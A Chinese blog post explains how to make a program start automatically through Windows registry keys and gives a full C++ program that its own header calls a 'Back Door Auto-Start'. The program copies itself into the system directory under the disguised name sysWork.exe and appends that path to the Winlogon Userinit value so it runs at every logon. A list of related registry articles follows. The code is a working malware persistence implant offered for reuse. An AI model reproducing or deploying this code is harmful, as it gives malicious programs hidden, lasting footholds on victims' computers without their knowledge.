简介

添加注册表项是实现文件自启动的经典方法之一,但因为操作注册表项是一个敏感操作,被报毒可能性较大,但即便如此,这个方法还是值得一学的,因为后期大部分编程都涉及到注册表操作。



最常使用到的注册表项有两项:

  1. "HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows"“load”键下的键值改为自启动目标文件路径,但缺点在于只能支持一个程序;
  2. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon"“Userinit”键下的值加上自启动目标文件路径,但是要注意虽然支持多文件自启动,但每个文件路径之间切记要用逗号隔开

C++代码样例

//////////////////////////////////////////////////////////////

//

// FileName : RegAutoRunDemo.cpp

// Creator : PeterZ1997

// Date : 2018-5-1 21:34

// Comment : Add registry key(s) to achieve the Back Door Auto-Start

//

//////////////////////////////////////////////////////////////

#include <cstdio>

#include <iostream>

#include <windows.h>

#include <cstdlib>

#include <cstring>

using namespace std;

const unsigned int MAX_COUNT = 255; /// Max String Length

CHAR szRegInfo[MAX_COUNT] = "\0";

/**

* @brief Determine if it is a substring

* @param str1 String-1

* @param str2 String-2

* @return Boollean Value

*/

BOOL IsSubString(LPCTSTR str1, LPCSTR str2)

{

	CHAR szTempStr01[MAX_COUNT] = "\0";

	CHAR szTempStr02[MAX_COUNT] = "\0";

	if (strlen(str1) < strlen(str2))

	{

		strcpy_s(szTempStr02, sizeof(szTempStr01), str1);

		strcpy_s(szTempStr01, sizeof(szTempStr02), str2);

	}

	else

	{

		strcpy_s(szTempStr01, sizeof(szTempStr01), str1);

		strcpy_s(szTempStr02, sizeof(szTempStr02), str2);

	}

	for (int i = 0; i < strlen(szTempStr01) - strlen(szTempStr02); i++)

	{

		for (int j = 0; j < strlen(szTempStr02); j++)

		{

			if (*(szTempStr01 + j + i) != *(szTempStr02 + j))

			{

				break;

			}

			if (*(szTempStr01 + j + i) == *(szTempStr02 + j) && j == strlen(szTempStr02) - 1)

			{

				return true;

			}

		}

	}

	return false;

}

/**

* @brief Add a string key to Registry

* @param hRoot root key

* @param szSubKey sub key after the root key

* @param szValueName key name

* @param szData key Data

* @return Boollean Value

*/

BOOL setStringToReg(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName, LPCTSTR szData)

{

	HKEY hKey;

	LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);

	if (lRes != ERROR_SUCCESS)

	{

		RegCloseKey(hKey);

		RegCloseKey(hRoot);

		return false;

	}

	lRes = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szData, strlen(szData));

	if (lRes != ERROR_SUCCESS)

	{

		RegCloseKey(hKey);

		RegCloseKey(hRoot);

		return false;

	}

	RegCloseKey(hKey);

	RegCloseKey(hRoot);

	return true;

}

/**

* @brief Get key info

* @param hRoot root key

* @param szSubKey sub key after the root key

* @param szValueName key name

* @return Boollean Value

*/

BOOL getRegInfo(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName)

{

	HKEY hKey;

	DWORD dwType = REG_SZ;

	DWORD dwLenData = strlen(szRegInfo);

	LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);

	if (lRes != ERROR_SUCCESS)

	{

		RegCloseKey(hKey);

		RegCloseKey(hRoot);

		return false;

	}

	RegQueryValueEx(hKey, szValueName, 0, &dwType, NULL, &dwLenData);

	lRes = RegQueryValueEx(hKey, szValueName, 0, &dwType, (LPBYTE)szRegInfo, &dwLenData);

	if (lRes != ERROR_SUCCESS)

	{

		RegCloseKey(hKey);

		RegCloseKey(hRoot);

		return false;

	}

	RegCloseKey(hKey);

	RegCloseKey(hRoot);

	return true;

}

/**

* @brief Main Function

*/

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)

{

	CHAR szSystemPath[MAX_COUNT] = "\0";

	CHAR szFilePath[MAX_COUNT] = "\0";

	CHAR szRegValue[MAX_COUNT] = "\0";

	CHAR szTotalString[MAX_COUNT] = "\0";

	if (getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit")) strcat_s(szRegValue, sizeof(szRegValue), szRegInfo);

	else return 0;

	for (int i = 1;;)

	{

		if (szRegValue[strlen(szRegValue) - i] == ' ')

		{

			szRegValue[strlen(szRegValue) - i] = '\0';

		}

		else

		{

			break;

		}

	}

	if (szRegValue[strlen(szRegValue) - 1] != ',') strcat_s(szRegValue, sizeof(szRegValue), ",");

	strcat_s(szTotalString, sizeof(szTotalString), szRegValue);

	if (!IsSubString(szTotalString, "C:\\Windows\\SysWOW64\\sysWork.exe"))

	{

		strcat_s(szTotalString, sizeof(szTotalString), "C:\\Windows\\SysWOW64\\");

		strcat_s(szTotalString, sizeof(szTotalString), "sysWork.exe,");

	}

	GetSystemDirectory(szSystemPath, sizeof(szSystemPath));

	strcat_s(szSystemPath, sizeof(szSystemPath), "\\sysWork.exe");

	if (!IsSubString(szRegValue, szSystemPath))

	{

		strcat_s(szTotalString, sizeof(szTotalString), szSystemPath);

		strcat_s(szTotalString, sizeof(szTotalString), ",");

	}

	GetModuleFileName(NULL, szFilePath, sizeof(szFilePath));

	if (strcmp(szFilePath, szSystemPath) && strcmp(szFilePath, "C:\\Windows\\SysWOW64\\sysWork.exe"))

	{

		if (!CopyFile(szFilePath, szSystemPath, true)) return 0;

		if (!setStringToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", szTotalString)) return 0;

	}

	MessageBox(NULL, "HelloWorld", "Tips", MB_OK);

	ExitProcess(0);

	return 0;

}

安全之路 —— C/C++实现利用添加注册表项实现文件自启动的更多相关文章

  1. 注册表的作用、bat文件中REG ADD命令添加注册表项以及bat

    注册表的用途与设置 注册表是windows的核心,里面储存着大量的系统信息,说白了就是一个庞大的数据库.如果你不懂什么是数据库,那没关系,不影响你了解注册表,不过最好对数据库有所了解.注册表里面所有的 ...

  2. 【转】C#程序打包安装部署之添加注册表项

    今天为大家整理了一些怎样去做程序安装包的具体文档,这些文档并不能确保每个人在做安装包的时候都能正确去生成和运行,但是这些文档的指导作用对于需要的朋友来说还是很有必要的,在实际产品的安装部署过程中可能有 ...

  3. C#程序打包安装部署之添加注册表项(转)

    今天为大家整理了一些怎样去做程序安装包的具体文档,这些文档并不能确保每个人在做安装包的时候都能正确去生成和运行,但是这些文档的指导作用对于需要的朋友来说还是很有必要的,在实际产品的安装部署过程中可能有 ...

  4. C# Winform打包部署时添加注册表信息实现开机自启动

    1.原理:需要开机自启动的程序,需要将其启动程序的路径写到注册表中指定的文件夹下 2. 写入注册表的方式有两种 a.在生成安装程序时配置 b.在程序运行时,动态配置 方法一:使用VS2010自带的打包 ...

  5. python 以及 pywin32添加注册表

    python 添加注册表信息: import sys from winreg import * # tweak as necessary version = sys.version[:3] insta ...

  6. vs install 安装时自动添加注册表

    思路:使用自定义 解决方案添加类库项目 添加安装程序类 随后右键查看代码 在构造函数添加事件 同时完成这个事件,在此事件中根据需要添加我们需要的内容,此处为添加注册表,并根据安装目录添加url pro ...

  7. Windows中添加自己的程序到开机启动中(添加服务,添加注册表)

    在系统启动的时候启动自己想要启动的程序: 方法一:利用开机启动文件夹 将exe文件或exe文件的快捷方式复制到(启动)文件夹下 以win7为例:开始→所有程序→启动→鼠标右键打开 方法二:添加系统服务 ...

  8. C# Winform打包部署时添加注册表信息实现开机启动

    使用VS自带的打包模块可以很方便的对项目进行打包部署,同时我们也可以在安装部署时操作注册表实现开机启动软件.具体实现如下: 1.添加安装部署项目后,鼠标右键安装项目->视图->注册表,HK ...

  9. 【转】C# Winform打包部署时添加注册表信息实现开机启动

    使用VS自带的打包模块可以很方便的对项目进行打包部署,同时我们也可以在安装部署时操作注册表实现开机启动软件.具体实现如下: 1.添加安装部署项目后,鼠标右键安装项目->视图->注册表,HK ...

随机推荐

  1. 如何在IDEA里给大数据项目导入该项目的相关源码(博主推荐)(类似eclipse里同一个workspace下单个子项目存在)(图文详解)

    不多说,直接上干货! 如果在一个界面里,可以是单个项目 注意:本文是以gradle项目的方式来做的! 如何在IDEA里正确导入从Github上下载的Gradle项目(含相关源码)(博主推荐)(图文详解 ...

  2. Kafka实战-Kafka Cluster

    1.概述 在<Kafka实战-入门>一篇中,为大家介绍了Kafka的相关背景.原理架构以及一些关键知识点,本篇博客为大家来赘述一下Kafka Cluster的相关内容,下面是今天为大家分享 ...

  3. JVM笔记10-性能优化之高级特性

    一.垃圾回收器配置和 GC 日志分析 1.堆典型配置: 32位的操作系统限制堆大小介于1.5G到2G,64位操作系统无限制,同时系统可用虚拟内存和可用物理内存都会限制最大堆的配置. 堆空间分配典型配置 ...

  4. Spring Boot初识(2)- Spring Boot整合Mybaties

    一.本文介绍 首先读这篇文章之前如果没有接触过Spring Boot可以看一下之前的文章,并且读这篇文章还需要你至少能写基本的sql语句.我在写这篇文章之前也想过到底是选择JPA还是Mybaties作 ...

  5. 内核开发知识第一讲.内核中的数据类型.重要数据结构.常用内核API函数.

    一丶内核中的数据类型 在内核中.程序的编写不能简单的用基本数据类型了. 因为操作系统不同.很有可能造成数据类型的长度不一.而产生重大问题.所以在内核中. 数据类型都一定重定义了. 数据类型 重定义数据 ...

  6. vuex学习及使用

    什么是vuex? 在SPA单页面组件的开发中vuex称为状态管理:简单的理解就是你在state中定义了一个数据之后,你可以在所在项目中的任何一个组件里进行获取.进行修改,并且你的修改可以得到全局的响应 ...

  7. mysql中的游标使用

    1.游标的作用及属性 游标的作用就是用于对查询数据库所返回的记录进行遍历,以便进行相应的操作:游标有下面这些属性: a.游标是只读的,也就是不能更新它: b.游标是不能滚动的,也就是只能在一个方向上进 ...

  8. 力软开发力软框架力软敏捷开发learun

    版本:6.1.6.2 演示地址:www.fishcmonkey.com 联系QQ:6539471

  9. MVC分部视图@Html.Partial

    加载分布视图的方式: //1.以视图名使用当前文件夹下的视图(如果没有找到,则搜索 Shared 文件夹) @Html.Partial("_test") //加载对应文件 /Vie ...

  10. mysql百万的数据快速创建索引

    测试数据本机一张表users有100百万条记录.在创建此表前没有未相应字段添加索引,所以此时需要为表添加索引.但是因为数据量大的原因,索引添加可能不成功,想了很多办法,终于挖坑成功. 开始准备工作, ...